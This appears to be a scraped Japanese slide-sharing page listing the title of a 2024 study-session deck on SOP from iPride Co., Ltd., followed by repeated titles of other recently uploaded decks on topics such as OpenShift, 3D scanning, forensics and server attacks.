SOPを理解する 2024/04/19 の勉強会で発表されたものですiPride Co., Ltd.
 

Recently uploaded (9)

【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
【早稲田AI研究会 講義資料】3DスキャンとTextTo3Dのツールを知ろう!(Vol.1)
 
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
TataPixel: 畳の異方性を利用した切り替え可能なディスプレイの提案
 
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察  ~Text-to-MusicとText-To-ImageかつImage-to-Music...モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察  ~Text-to-MusicとText-To-ImageかつImage-to-Music...
モーダル間の変換後の一致性とジャンル表を用いた解釈可能性の考察 ~Text-to-MusicとText-To-ImageかつImage-to-Music...
 
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdfAWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
AWS の OpenShift サービス (ROSA) を使った OpenShift Virtualizationの始め方.pdf
 
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
自分史上一番早い2024振り返り〜コロナ後、仕事は通常ペースに戻ったか〜 by IoT fullstack engineer
 
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
デジタル・フォレンジックの最新動向(2024年4月27日情洛会総会特別講演スライド)
 
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
CTO, VPoE, テックリードなどリーダーポジションに登用したくなるのはどんな人材か?
 
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdfクラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
クラウドネイティブなサーバー仮想化基盤 - OpenShift Virtualization.pdf
 
SOPを理解する 2024/04/19 の勉強会で発表されたものです
SOPを理解する       2024/04/19 の勉強会で発表されたものですSOPを理解する       2024/04/19 の勉強会で発表されたものです
SOPを理解する 2024/04/19 の勉強会で発表されたものです
 

さくらのVPSに来る悪い人を観察する その2